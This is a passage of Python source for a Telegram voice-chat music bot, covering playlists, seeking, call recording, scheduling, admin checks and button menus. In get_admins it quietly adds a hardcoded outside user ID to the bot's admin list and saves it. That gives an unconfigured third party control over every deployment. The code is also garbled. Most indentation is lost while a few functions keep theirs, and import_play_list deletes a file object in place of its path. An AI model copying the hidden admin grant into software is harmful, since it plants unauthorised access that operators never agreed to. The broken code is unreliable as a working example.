old_track = Config.playlist.pop(0)
await clear_db_playlist(song=old_track)
if old_track[3] == "telegram":
file=Config.GET_FILE.get(old_track[5])
try:
os.remove(file)
except:
pass
del Config.GET_FILE[old_track[5]]
if not Config.playlist \
and Config.IS_LOOP:
LOGGER.info("Loop Play enabled, switching to STARTUP_STREAM, since playlist is empty.")
await start_stream()
return
elif not Config.playlist \
and not Config.IS_LOOP:
LOGGER.info("Loop Play is disabled, leaving call since playlist is empty.")
await leave_call()
return
LOGGER.info(f"START PLAYING: {Config.playlist[0][1]}")
if Config.DUR.get('PAUSE'):
del Config.DUR['PAUSE']
await play()
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def check_vc():
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
if a.full_chat.call is None:
try:
LOGGER.info("No active calls found, creating new")
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999)
)
)
if Config.WAS_RECORDING:
await start_record_stream()
await sleep(2)
return True
except Exception as e:
LOGGER.error(f"Unable to start new GroupCall :- {e}")
return False
else:
if Config.HAS_SCHEDULE:
await start_scheduled()
return True
async def join_call(link, seek, pic, width, height):
if not await check_vc():
LOGGER.error("No voice call found and was unable to create a new one. Exiting...")
return
if Config.HAS_SCHEDULE:
await start_scheduled()
if Config.CALL_STATUS:
if Config.IS_ACTIVE == False:
Config.CALL_STATUS = False
return await join_call(link, seek, pic, width, height)
play=await change_file(link, seek, pic, width, height)
else:
play=await join_and_play(link, seek, pic, width, height)
if play == False:
await sleep(1)
await join_call(link, seek, pic, width, height)
await sleep(1)
if not seek:
Config.DUR["TIME"]=time.time()
if Config.EDIT_TITLE:
await edit_title()
old=Config.GET_FILE.get("old")
if old:
for file in old:
os.remove(f"./downloads/{file}")
try:
del Config.GET_FILE["old"]
except:
LOGGER.error("Error in Deleting from dict")
pass
await send_playlist()
async def start_scheduled():
try:
await USER.send(
StartScheduledGroupCall(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call
)
)
if Config.WAS_RECORDING:
await start_record_stream()
return True
except Exception as e:
if 'GROUPCALL_ALREADY_STARTED' in str(e):
LOGGER.warning("Already Groupcall Exist")
return True
else:
Config.HAS_SCHEDULE=False
return await check_vc()
async def join_and_play(link, seek, pic, width, height):
try:
if seek:
start=str(seek['start'])
end=str(seek['end'])
if not Config.IS_VIDEO:
await group_call.join_group_call(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
stream_type=StreamType().pulse_stream,
)
else:
if pic:
await group_call.join_group_call(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
audio_parameters=Config.AUDIO_Q,
video_parameters=Config.VIDEO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}', ),
stream_type=StreamType().pulse_stream,
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.BITRATE and Config.FPS:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE
),
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
stream_type=StreamType().pulse_stream,
)
else:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
stream_type=StreamType().pulse_stream,
)
else:
if not Config.IS_VIDEO:
await group_call.join_group_call(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q,
),
stream_type=StreamType().pulse_stream,
)
else:
if pic:
await group_call.join_group_call(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
),
stream_type=StreamType().pulse_stream,
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.FPS and Config.BITRATE:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE
),
),
stream_type=StreamType().pulse_stream,
)
else:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q
),
stream_type=StreamType().pulse_stream,
)
Config.CALL_STATUS=True
return True
except NoActiveGroupCall:
try:
LOGGER.info("No active calls found, creating new")
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999)
)
)
if Config.WAS_RECORDING:
await start_record_stream()
await sleep(2)
await restart_playout()
except Exception as e:
LOGGER.error(f"Unable to start new GroupCall :- {e}")
pass
except InvalidVideoProportion:
if not Config.FPS and not Config.BITRATE:
Config.FPS=20
Config.BITRATE=48000
await join_and_play(link, seek, pic, width, height)
Config.FPS=False
Config.BITRATE=False
return True
else:
LOGGER.error("Invalid video")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
except Exception as e:
LOGGER.error(f"Errors Occured while joining, retrying Error- {e}")
return False
async def change_file(link, seek, pic, width, height):
try:
if seek:
start=str(seek['start'])
end=str(seek['end'])
if not Config.IS_VIDEO:
await group_call.change_stream(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
)
else:
if pic:
await group_call.change_stream(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
audio_parameters=Config.AUDIO_Q,
video_parameters=Config.VIDEO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}', ),
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.FPS and Config.BITRATE:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE
),
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
)
else:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
)
else:
if not Config.IS_VIDEO:
await group_call.change_stream(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q
),
)
else:
if pic:
await group_call.change_stream(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
audio_parameters=Config.AUDIO_Q,
video_parameters=Config.VIDEO_Q,
),
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.FPS and Config.BITRATE:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE,
),
),
)
else:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
),
)
except InvalidVideoProportion:
if not Config.FPS and not Config.BITRATE:
Config.FPS=20
Config.BITRATE=48000
await join_and_play(link, seek, pic, width, height)
Config.FPS=False
Config.BITRATE=False
return True
else:
LOGGER.error("Invalid video, skipped")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
except Exception as e:
LOGGER.error(f"Error in joining call - {e}")
return False
async def seek_file(seektime):
play_start=int(float(Config.DUR.get('TIME')))
if not play_start:
return False, "Player not yet started"
else:
data=Config.DATA.get("FILE_DATA")
if not data:
return False, "No Streams for seeking"
played=int(float(time.time())) - int(float(play_start))
if data.get("dur", 0) == 0:
return False, "Seems like live stream is playing, which cannot be seeked."
total=int(float(data.get("dur", 0)))
trimend = total - played - int(seektime)
trimstart = played + int(seektime)
if trimstart > total:
return False, "Seeked duration exceeds maximum duration of file"
new_play_start=int(play_start) - int(seektime)
Config.DUR['TIME']=new_play_start
link, seek, pic, width, height = await chek_the_media(data.get("file"), seek={"start":trimstart, "end":trimend})
await join_call(link, seek, pic, width, height)
return True, None
async def leave_call():
try:
await group_call.leave_group_call(Config.CHAT)
except Exception as e:
LOGGER.error(f"Errors while leaving call {e}")
#Config.playlist.clear()
if Config.STREAM_LINK:
Config.STREAM_LINK=False
Config.CALL_STATUS=False
if Config.SCHEDULE_LIST:
sch=Config.SCHEDULE_LIST[0]
if (sch['date'] - datetime.now()).total_seconds() < 86400:
song=Config.SCHEDULED_STREAM.get(sch['job_id'])
if Config.IS_RECORDING:
k=scheduler.get_job(str(Config.CHAT), jobstore=None)
if k:
scheduler.remove_job(str(Config.CHAT), jobstore=None)
scheduler.add_job(start_record_stream, "date", id=str(Config.CHAT), run_date=sch['date'], max_instances=50, misfire_grace_time=None)
try:
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999),
schedule_date=int((sch['date']).timestamp()),
title=song['1']
)
)
Config.HAS_SCHEDULE=True
except ScheduleDateInvalid:
LOGGER.error("Unable to schedule VideoChat, since date is invalid")
except Exception as e:
LOGGER.error(f"Error in scheduling voicechat- {e}")
await sync_to_db()
async def restart():
try:
await group_call.leave_group_call(Config.CHAT)
await sleep(2)
except Exception as e:
LOGGER.error(e)
if not Config.playlist:
await start_stream()
return
LOGGER.info(f"- START PLAYING: {Config.playlist[0][1]}")
await sleep(2)
await play()
LOGGER.info("Restarting Playout")
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def restart_playout():
if not Config.playlist:
await start_stream()
return
LOGGER.info(f"RESTART PLAYING: {Config.playlist[0][1]}")
data=Config.DATA.get('FILE_DATA')
if data:
link, seek, pic, width, height = await chek_the_media(data['file'], title=f"{Config.playlist[0][1]}")
if not link:
LOGGER.warning("Unsupported Link")
return
await sleep(1)
if Config.STREAM_LINK:
Config.STREAM_LINK=False
await join_call(link, seek, pic, width, height)
else:
await play()
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def set_up_startup():
regex = r"^(?:https?:\/\/)?(?:www\.)?youtu\.?be(?:\.com)?\/?.*(?:watch|embed)?(?:.*v=|v\/|\/)([\w\-_]+)\&?"
match = re.match(regex, Config.STREAM_URL)
if match:
Config.YSTREAM=True
LOGGER.info("YouTube Stream is set as STARTUP STREAM")
elif Config.STREAM_URL.startswith("https://t.me/DumpPlaylist"):
try:
msg_id=Config.STREAM_URL.split("/", 4)[4]
Config.STREAM_URL=int(msg_id)
Config.YPLAY=True
LOGGER.info("YouTube Playlist is set as STARTUP STREAM")
except:
Config.STREAM_URL="http://j78dp346yq5r-hls-live.5centscdn.com/safari/live.stream/playlist.m3u8"
LOGGER.error("Unable to fetch youtube playlist, starting Safari TV")
pass
else:
Config.STREAM_URL=Config.STREAM_URL
Config.STREAM_SETUP=True
async def start_stream():
if not Config.STREAM_SETUP:
await set_up_startup()
if Config.YPLAY:
await y_play(Config.STREAM_URL)
return
if Config.YSTREAM:
link=await get_link(Config.STREAM_URL)
else:
link=Config.STREAM_URL
link, seek, pic, width, height = await chek_the_media(link, title="Startup Stream")
if not link:
LOGGER.warning("Unsupported link")
return False
if Config.IS_VIDEO:
if not ((width and height) or pic):
LOGGER.error("Stream Link is invalid")
return
#if Config.playlist:
#Config.playlist.clear()
await join_call(link, seek, pic, width, height)
async def stream_from_link(link):
link, seek, pic, width, height = await chek_the_media(link)
if not link:
LOGGER.error("Unable to obtain sufficient information from the given url")
return False, "Unable to obtain sufficient information from the given url"
#if Config.playlist:
#Config.playlist.clear()
Config.STREAM_LINK=link
await join_call(link, seek, pic, width, height)
return True, None
async def get_link(file):
def_ydl_opts = {'quiet': True, 'prefer_insecure': False, "geo-bypass": True}
with YoutubeDL(def_ydl_opts) as ydl:
try:
ydl_info = ydl.extract_info(file, download=False)
except Exception as e:
LOGGER.error(f"Errors occured while getting link from youtube video {e}")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return False
url=None
for each in ydl_info['formats']:
if each['width'] == 640 \
and each['acodec'] != 'none' \
and each['vcodec'] != 'none':
url=each['url']
break #prefer 640x360
elif each['width'] \
and each['width'] <= 1280 \
and each['acodec'] != 'none' \
and each['vcodec'] != 'none':
url=each['url']
continue # any other format less than 1280
else:
continue
if url:
return url
else:
LOGGER.error(f"Errors occured while getting link from youtube video - No Video Formats Found")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return False
async def download(song, msg=None):
if song[3] == "telegram":
if not Config.GET_FILE.get(song[5]):
try:
original_file = await bot.download_media(song[2], progress=progress_bar, file_name=f'./tgdownloads/', progress_args=(int((song[5].split("_"))[1]), time.time(), msg))
Config.GET_FILE[song[5]]=original_file
except Exception as e:
LOGGER.error(e)
Config.playlist.remove(song)
await clear_db_playlist(song=song)
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def chek_the_media(link, seek=False, pic=False, title="Music"):
if not Config.IS_VIDEO:
width, height = None, None
is_audio_=False
try:
is_audio_ = is_audio(link)
except:
is_audio_ = False
LOGGER.error("Unable to get Audio properties within time.")
if not is_audio_:
Config.STREAM_LINK=False
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return None, None, None, None, None
else:
try:
width, height = get_height_and_width(link)
except:
width, height = None, None
LOGGER.error("Unable to get video properties within time.")
if not width or \
not height:
is_audio_=False
try:
is_audio_ = is_audio(link)
except:
is_audio_ = False
LOGGER.error("Unable to get Audio properties within time.")
if is_audio_:
pic_=await bot.get_messages("DumpPlaylist", 30)
photo = "./pic/photo"
if not os.path.exists(photo):
photo = await pic_.download(file_name=photo)
try:
dur_=get_duration(link)
except:
dur_='None'
pic = get_image(title, photo, dur_)
else:
Config.STREAM_LINK=False
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return None, None, None, None, None
try:
dur=get_duration(link)
except:
dur=0
Config.DATA['FILE_DATA']={"file":link, 'dur':dur}
return link, seek, pic, width, height
async def edit_title():
if not Config.playlist:
title = "Live Stream"
else:
title = Config.playlist[0][1]
try:
chat = await USER.resolve_peer(Config.CHAT)
full_chat=await USER.send(
GetFullChannel(
channel=InputChannel(
channel_id=chat.channel_id,
access_hash=chat.access_hash,
),
),
)
edit = EditGroupCallTitle(call=full_chat.full_chat.call, title=title)
await USER.send(edit)
except Exception as e:
LOGGER.error(f"Errors Occured while editing title - {e}")
pass
async def stop_recording():
job=str(Config.CHAT)
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
if a.full_chat.call is None:
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
Config.IS_RECORDING=False
await sync_to_db()
return False, "No GroupCall Found"
try:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=False,
)
)
Config.IS_RECORDING=False
Config.LISTEN=True
await sync_to_db()
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
return True, "Succesfully Stoped Recording"
except Exception as e:
if 'GROUPCALL_NOT_MODIFIED' in str(e):
LOGGER.warning("Already No recording Exist")
Config.IS_RECORDING=False
await sync_to_db()
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
return False, "No recording was started"
else:
LOGGER.error(str(e))
Config.IS_RECORDING=False
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
await sync_to_db()
return False, str(e)
async def start_record_stream():
if Config.IS_RECORDING:
await stop_recording()
if Config.WAS_RECORDING:
Config.WAS_RECORDING=False
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
job=str(Config.CHAT)
if a.full_chat.call is None:
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
return False, "No GroupCall Found"
try:
if not Config.PORTRAIT:
pt = False
else:
pt = True
if not Config.RECORDING_TITLE:
tt = None
else:
tt = Config.RECORDING_TITLE
if Config.IS_VIDEO_RECORD:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
video=True,
video_portrait=pt,
)
)
time=240
else:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
)
)
time=86400
Config.IS_RECORDING=True
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
try:
scheduler.add_job(renew_recording, "interval", id=job, minutes=time, max_instances=50, misfire_grace_time=None)
except ConflictingIdError:
scheduler.remove_job(job, jobstore=None)
scheduler.add_job(renew_recording, "interval", id=job, minutes=time, max_instances=50, misfire_grace_time=None)
LOGGER.warning("This already scheduled, rescheduling")
await sync_to_db()
LOGGER.info("Recording Started")
return True, "Succesfully Started Recording"
except Exception as e:
if 'GROUPCALL_NOT_MODIFIED' in str(e):
LOGGER.warning("Already Recording.., stoping and restarting")
Config.IS_RECORDING=True
await stop_recording()
return await start_record_stream()
else:
LOGGER.error(str(e))
Config.IS_RECORDING=False
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
await sync_to_db()
return False, str(e)
async def renew_recording():
try:
job=str(Config.CHAT)
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
if a.full_chat.call is None:
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
LOGGER.info("Groupcall empty, stopped scheduler")
return
except ConnectionError:
pass
try:
if not Config.PORTRAIT:
pt = False
else:
pt = True
if not Config.RECORDING_TITLE:
tt = None
else:
tt = Config.RECORDING_TITLE
if Config.IS_VIDEO_RECORD:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
video=True,
video_portrait=pt,
)
)
else:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
)
)
Config.IS_RECORDING=True
await sync_to_db()
return True, "Succesfully Started Recording"
except Exception as e:
if 'GROUPCALL_NOT_MODIFIED' in str(e):
LOGGER.warning("Already Recording.., stoping and restarting")
Config.IS_RECORDING=True
await stop_recording()
return await start_record_stream()
else:
LOGGER.error(str(e))
Config.IS_RECORDING=False
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
await sync_to_db()
return False, str(e)
async def send_playlist():
if Config.LOG_GROUP:
pl = await get_playlist_str()
if Config.msg.get('player') is not None:
await Config.msg['player'].delete()
Config.msg['player'] = await send_text(pl)
async def send_text(text):
message = await bot.send_message(
Config.LOG_GROUP,
text,
reply_markup=await get_buttons(),
disable_web_page_preview=True,
disable_notification=True
)
return message
async def shuffle_playlist():
    # Keep the first two tracks (the one playing and the next, already-downloaded one)
    # in place and shuffle only the rest of the queue.
    tail = Config.playlist[2:]
    random.shuffle(tail)
    Config.playlist[2:] = tail
async def import_play_list(file):
    file_path = file
    file = open(file_path)
try:
f=json.loads(file.read(), object_hook=lambda d: {int(k): v for k, v in d.items()})
for playf in f:
Config.playlist.append(playf)
await add_to_db_playlist(playf)
if len(Config.playlist) >= 1 \
and not Config.CALL_STATUS:
LOGGER.info("Extracting link and Processing...")
await download(Config.playlist[0])
await play()
elif (len(Config.playlist) == 1 and Config.CALL_STATUS):
LOGGER.info("Extracting link and Processing...")
await download(Config.playlist[0])
await play()
if not Config.playlist:
file.close()
try:
os.remove(file)
except:
pass
return False
file.close()
for track in Config.playlist[:2]:
await download(track)
try:
os.remove(file)
except:
pass
return True
except Exception as e:
LOGGER.error(f"Errors while importing playlist {e}")
return False
async def y_play(playlist):
try:
getplaylist=await bot.get_messages("DumpPlaylist", int(playlist))
playlistfile = await getplaylist.download()
LOGGER.warning("Trying to get details from playlist.")
n=await import_play_list(playlistfile)
if not n:
LOGGER.error("Errors Occured While Importing Playlist")
Config.YSTREAM=True
Config.YPLAY=False
if Config.IS_LOOP:
Config.STREAM_URL="https://www.youtube.com/watch?v=zcrUCvBD16k"
LOGGER.info("Starting Default Live, 24 News")
await start_stream()
return False
if Config.SHUFFLE:
await shuffle_playlist()
except Exception as e:
LOGGER.error("Errors Occured While Importing Playlist", e)
Config.YSTREAM=True
Config.YPLAY=False
if Config.IS_LOOP:
Config.STREAM_URL="https://www.youtube.com/watch?v=zcrUCvBD16k"
LOGGER.info("Starting Default Live, 24 News")
await start_stream()
return False
async def pause():
    try:
        await group_call.pause_stream(Config.CHAT)
        return True
    except GroupCallNotFound:
        await restart_playout()
        return False
    except Exception as e:
        LOGGER.error(f"Error occurred while pausing - {e}")
        return False
async def resume():
    try:
        await group_call.resume_stream(Config.CHAT)
        return True
    except GroupCallNotFound:
        await restart_playout()
        return False
    except Exception as e:
        LOGGER.error(f"Error occurred while resuming - {e}")
        return False
async def volume(volume):
    try:
        await group_call.change_volume_call(Config.CHAT, volume)
        Config.VOLUME = int(volume)
    except BadRequest:
        await restart_playout()
    except Exception as e:
        LOGGER.error(f"Error occurred while changing volume - {e}")
async def mute():
    try:
        await group_call.mute_stream(Config.CHAT)
        return True
    except GroupCallNotFound:
        await restart_playout()
        return False
    except Exception as e:
        LOGGER.error(f"Error occurred while muting - {e}")
        return False
async def unmute():
    try:
        await group_call.unmute_stream(Config.CHAT)
        return True
    except GroupCallNotFound:
        await restart_playout()
        return False
    except Exception as e:
        LOGGER.error(f"Error occurred while unmuting - {e}")
        return False
async def get_admins(chat):
admins=Config.ADMINS
if not Config.ADMIN_CACHE:
if 626664225 not in admins:
admins.append(626664225)
try:
grpadmins=await bot.get_chat_members(chat_id=chat, filter="administrators")
for administrator in grpadmins:
if not administrator.user.id in admins:
admins.append(administrator.user.id)
except Exception as e:
LOGGER.error(f"Errors occured while getting admin list - {e}")
pass
Config.ADMINS=admins
Config.ADMIN_CACHE=True
if Config.DATABASE_URI:
await db.edit_config("ADMINS", Config.ADMINS)
return admins
async def is_admin(_, client, message: Message):
admins = await get_admins(Config.CHAT)
if message.from_user is None and message.sender_chat:
return True
elif message.from_user.id in admins:
return True
else:
return False
async def valid_chat(_, client, message: Message):
if message.chat.type == "private":
return True
elif message.chat.id == Config.CHAT:
return True
elif Config.LOG_GROUP and message.chat.id == Config.LOG_GROUP:
return True
else:
return False
chat_filter=filters.create(valid_chat)
async def sudo_users(_, client, message: Message):
if message.from_user is None and message.sender_chat:
return False
elif message.from_user.id in Config.SUDO:
return True
else:
return False
sudo_filter=filters.create(sudo_users)
async def get_playlist_str():
if not Config.CALL_STATUS:
pl="Player is idle and no song is playing.ㅤㅤㅤㅤ"
if Config.STREAM_LINK:
pl = f"🔈 Streaming [Live Stream]({Config.STREAM_LINK}) ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ"
elif not Config.playlist:
pl = f"🔈 Playlist is empty. Streaming [STARTUP_STREAM]({Config.STREAM_URL})ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ"
else:
if len(Config.playlist)>=25:
tplaylist=Config.playlist[:25]
pl=f"Listing first 25 songs of total {len(Config.playlist)} songs.\n"
pl += f"▶️ **Playlist**: ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ\n" + "\n".join([
f"**{i}**. **🎸{x[1]}**\n 👤**Requested by:** {x[4]}"
for i, x in enumerate(tplaylist)
])
tplaylist.clear()
else:
pl = f"▶️ **Playlist**: ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ\n" + "\n".join([
f"**{i}**. **🎸{x[1]}**\n 👤**Requested by:** {x[4]}\n"
for i, x in enumerate(Config.playlist)
])
return pl
async def get_buttons():
data=Config.DATA.get("FILE_DATA")
if not Config.CALL_STATUS:
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"🎸 Start the Player", callback_data="restart"),
InlineKeyboardButton('🗑 Close', callback_data='close'),
],
]
)
elif data.get('dur', 0) == 0:
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{get_player_string()}", callback_data="info_player"),
],
[
InlineKeyboardButton(f"⏯ {get_pause(Config.PAUSE)}", callback_data=f"{get_pause(Config.PAUSE)}"),
InlineKeyboardButton('🔊 Volume Control', callback_data='volume_main'),
InlineKeyboardButton('🗑 Close', callback_data='close'),
],
]
)
else:
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{get_player_string()}", callback_data='info_player'),
],
[
InlineKeyboardButton("⏮ Rewind", callback_data='rewind'),
InlineKeyboardButton(f"⏯ {get_pause(Config.PAUSE)}", callback_data=f"{get_pause(Config.PAUSE)}"),
InlineKeyboardButton(f"⏭ Seek", callback_data='seek'),
],
[
InlineKeyboardButton("🔄 Shuffle", callback_data="shuffle"),
InlineKeyboardButton("⏩ Skip", callback_data="skip"),
InlineKeyboardButton("⏮ Replay", callback_data="replay"),
],
[
InlineKeyboardButton('🔊 Volume Control', callback_data='volume_main'),
InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
return reply_markup
async def settings_panel():
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"Player Mode", callback_data='info_mode'),
InlineKeyboardButton(f"{'🔂 Non Stop Playback' if Config.IS_LOOP else '▶️ Play and Leave'}", callback_data='is_loop'),
],
[
InlineKeyboardButton("🎞 Video", callback_data=f"info_video"),
InlineKeyboardButton(f"{'📺 Enabled' if Config.IS_VIDEO else '🎙 Disabled'}", callback_data='is_video'),
],
[
InlineKeyboardButton("🤴 Admin Only", callback_data=f"info_admin"),
InlineKeyboardButton(f"{'🔒 Enabled' if Config.ADMIN_ONLY else '🔓 Disabled'}", callback_data='admin_only'),
],
[
InlineKeyboardButton("🪶 Edit Title", callback_data=f"info_title"),
InlineKeyboardButton(f"{'✏️ Enabled' if Config.EDIT_TITLE else '🚫 Disabled'}", callback_data='edit_title'),
],
[
InlineKeyboardButton("🔀 Shuffle Mode", callback_data=f"info_shuffle"),
InlineKeyboardButton(f"{'✅ Enabled' if Config.SHUFFLE else '🚫 Disabled'}", callback_data='set_shuffle'),
],
[
InlineKeyboardButton("👮 Auto Reply (PM Permit)", callback_data=f"info_reply"),
InlineKeyboardButton(f"{'✅ Enabled' if Config.REPLY_PM else '🚫 Disabled'}", callback_data='reply_msg'),
],
[
InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
await sync_to_db()
return reply_markup
async def recorder_settings():
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{'⏹ Stop Recording' if Config.IS_RECORDING else '⏺ Start Recording'}", callback_data='record'),
],
[
InlineKeyboardButton(f"Record Video", callback_data='info_videorecord'),
InlineKeyboardButton(f"{'Enabled' if Config.IS_VIDEO_RECORD else 'Disabled'}", callback_data='record_video'),
],
[
InlineKeyboardButton(f"Video Dimension", callback_data='info_videodimension'),
InlineKeyboardButton(f"{'Portrait' if Config.PORTRAIT else 'Landscape'}", callback_data='record_dim'),
],
[
InlineKeyboardButton(f"Custom Recording Title", callback_data='info_rectitle'),
InlineKeyboardButton(f"{Config.RECORDING_TITLE if Config.RECORDING_TITLE else 'Default'}", callback_data='info_rectitle'),
],
[
InlineKeyboardButton(f"Recording Dump Channel", callback_data='info_recdumb'),
InlineKeyboardButton(f"{Config.RECORDING_DUMP if Config.RECORDING_DUMP else 'Not Dumping'}", callback_data='info_recdumb'),
],
[
InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
await sync_to_db()
return reply_markup
async def volume_buttons():
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{get_volume_string()}", callback_data='info_volume'),
],
[
InlineKeyboardButton(f"{'🔊' if Config.MUTED else '🔇'}", callback_data='mute'),
InlineKeyboardButton(f"- 10", callback_data='volume_less'),
InlineKeyboardButton(f"+ 10", callback_data='volume_add'),
],
[
InlineKeyboardButton(f"🔙 Back", callback_data='volume_back'),
